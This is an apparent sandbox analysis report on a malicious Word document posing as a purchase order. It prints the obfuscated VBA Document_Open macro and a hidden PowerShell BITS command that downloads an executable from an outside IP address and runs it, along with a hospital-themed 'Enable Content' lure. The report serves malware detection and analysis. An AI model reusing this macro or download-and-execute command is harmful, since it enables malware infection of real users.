Loading ...

Play interactive tourEdit tour

Analysis Report RFL_PO 69002.doc

Overview

General Information

Sample Name:RFL_PO 69002.doc
Analysis ID:433026
MD5:ee4431e2c986dcac3fc8078c674ba65e
SHA1:64aa75122963e38f52739ba819788e4bfcfb3651
SHA256:4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Non Interactive PowerShell
Sigma detected: Suspicious Bitsadmin Job via PowerShell

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2352 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • powershell.exe (PID: 2280 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2352, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 2280
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2352, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 2280
Sigma detected: Suspicious Bitsadmin Job via PowerShellShow sources
Source: Process startedAuthor: Endgame, JHasenbusch (ported to sigma for oscd.community): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2352, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 2280

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://31.210.20.45/1xBet/RFL_0769002.exeVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: RFL_PO 69002.docVirustotal: Detection: 15%Perma Link
Source: RFL_PO 69002.docReversingLabs: Detection: 21%
Machine Learning detection for sampleShow sources
Source: RFL_PO 69002.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000002.00000002.2070730156.0000000002B30000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B00F2CD-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
Source: RFL_PO 69002.docString found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex
Source: RFL_PO 69002.docString found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex9
Source: powershell.exe, 00000002.00000002.2068494713.00000000000E0000.00000004.00000020.sdmpString found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe
Source: powershell.exe, 00000002.00000002.2068560577.0000000000193000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.2068695436.0000000000374000.00000004.00000040.sdmpString found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC:
Source: powershell.exe, 00000002.00000002.2068535215.0000000000169000.00000004.00000020.sdmpString found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe2.exe
Source: powershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 4Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital O "g" ' 0' ' I WO"
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 0Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 1Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Document contains an embedded VBA macro which may execute processesShow sources
Source: RFL_PO 69002.docOLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe")Name: Document_Open
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: RFL_PO 69002.docOLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))Name: Document_Open
Source: RFL_PO 69002.docOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: RFL_PO 69002.docOLE indicator, VBA macros: true
Source: classification engineClassification label: mal84.expl.winDOC@3/6@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$L_PO 69002.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAD4E.tmpJump to behavior
Source: RFL_PO 69002.docOLE indicator, Word Document stream: true
Source: RFL_PO 69002.docOLE document summary: title field not present or empty
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................x...............................x.....................`I.........v.....................K..............4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................%.v......................u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: RFL_PO 69002.docVirustotal: Detection: 15%
Source: RFL_PO 69002.docReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000002.00000002.2070730156.0000000002B30000.00000002.00000001.sdmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: RFL_PO 69002.docStream path 'Data' entropy: 7.9926896989 (max. 8.0)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000002.00000002.2068506136.000000000011E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
